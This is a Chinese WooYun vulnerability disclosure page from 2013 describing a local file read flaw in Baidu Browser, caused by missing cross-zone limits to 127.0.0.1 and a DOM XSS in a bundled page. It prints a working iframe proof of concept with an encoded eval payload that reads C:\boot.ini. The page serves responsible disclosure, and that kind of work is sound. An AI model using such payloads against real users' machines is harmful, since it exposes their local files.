漏洞概要
关注数(24)
关注此漏洞
漏洞标题:百度浏览器本地任意文件读取漏洞
相关厂商:百度
提交时间:2013-11-06 17:23
修复时间:2013-12-21 17:23
公开时间:2013-12-21 17:23
漏洞类型:设计缺陷/逻辑错误
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2013-11-06: 细节已通知厂商并且等待厂商处理中
2013-11-11: 厂商已经确认,细节仅向厂商公开
2013-11-21: 细节向核心白帽子及相关领域专家公开
2013-12-01: 细节向普通白帽子公开
2013-12-11: 细节向实习白帽子公开
2013-12-21: 细节向公众公开
简要描述:
百度浏览器在实现跨域方面存在缺陷导致该漏洞。
详细说明:
从 internet 域跨到 127.0.0.1 域会产生安全问题,所以目前大部分浏览器都进行了防御,但是百度浏览器在 IE 内核下却没有任何限制。
通过下面代码可以进行测试:
alert_1.html 和 alert_2.html 是我本地两个测试文件,通过任意 internet 域访问该页面可以发现 alert_2.html 中的代码执行了。说明百度浏览器对访问 file 域有限制,对访问 127.0.0.1 无限制。
其实到这里就是漏洞的全部,为了配合对这个漏洞进行利用,我们发现百度浏览器自带的这个页面 C:\Program Files\baidu\BaiduBrowser\resource\extension\security\safe_default.html 存在 dom xss。
直接就用 innerHTML 写入从 URL 中取出的内容。
so,通过下面 poc,来读取本地文件:
漏洞证明:
<iframe src='\\127.0.0.1\c$/Program Files\baidu\BaiduBrowser\resource\extension\security\safe_default.html#name=xxx<script defer>eval(unescape(unescape("xmlhttp%253Dnew%2520ActiveXObject%2528%2522Msxml2.XMLHTTP.3.0%2522%2529%253Bxmlhttp.open%2528%2522GET%2522%252C%2522file%253A////127.0.0.1/c%2524/boot.ini%2522%252Cfalse%2529%253Bxmlhttp.send%2528%2529%253Balert%2528xmlhttp.responseText%2529%253B")))</script>&path=yyy'></iframe>
修复方案:
1、限定 internet 域对 127.0.0.1 域的访问。
版权声明:转载请注明来源 只抽红梅@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:7
确认时间:2013-11-11 11:33
厂商回复:
感谢对百度安全的关注,安全组立即处理此问题。
--“百度,因你更安全”
最新状态:
暂无
漏洞评价:
评论
-
2013-11-06 17:27 |
疯狗 
( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
-
2013-11-06 17:27 |
疯狗 
( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
-
2013-11-06 17:28 |
小川 
( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)
-
2013-11-06 17:46 |
Mr.醉心 ( 路人 | Rank:2 漏洞数:2 | 爱生活,爱音乐,爱美女,更爱波多野结衣)
-
2013-11-11 11:43 |
乌云最帅的淫 ( 实习白帽子 | Rank:51 漏洞数:23 | 不以淫荡惊天下,就以闷骚动世人)
@疯狗 提交了一个淘宝危害很大的洞.老大速去审核下把
-
2013-12-21 18:44 |
c4bbage ( 路人 | Rank:15 漏洞数:7 | var_dump($me);)